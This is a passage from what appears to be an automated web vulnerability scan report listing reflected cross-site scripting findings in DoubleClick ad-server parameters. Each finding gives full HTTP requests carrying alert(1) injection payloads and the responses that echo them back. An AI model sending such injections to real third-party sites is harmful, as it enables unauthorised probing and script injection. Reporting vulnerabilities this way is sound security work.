Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5832
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:28 GMT
Expires: Mon, 07 Feb 2011 02:27:28 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\">
...[SNIP]...

3.6. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93598"-alert(1)-"2cf0fabfdd0 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5832
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:23 GMT
Expires: Mon, 07 Feb 2011 02:27:23 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

3.7. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e079"-alert(1)-"2a7444a0285 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:26:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscr
...[SNIP]...

3.8. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60df4'-alert(1)-'c9f82baf3eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\">
...[SNIP]...

3.9. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee78"-alert(1)-"efef978bc1a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.10. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a7dc'-alert(1)-'55516c4309 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5936

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7d/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

3.11. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51b4"-alert(1)-"a1b3e2ed110 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcal
...[SNIP]...

3.12. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c2c'-alert(1)-'91bc6693606 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

3.13. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16119'-alert(1)-'79d788ac1d9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:29 GMT
Expires: Mon, 07 Feb 2011 02:27:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

3.14. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b42"-alert(1)-"bb18e09f345 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:25 GMT
Expires: Mon, 07 Feb 2011 02:27:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never"
...[SNIP]...

3.15. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f009"-alert(1)-"a91a102c09b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:26:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

3.16. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7ca'-alert(1)-'06a06d14574 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
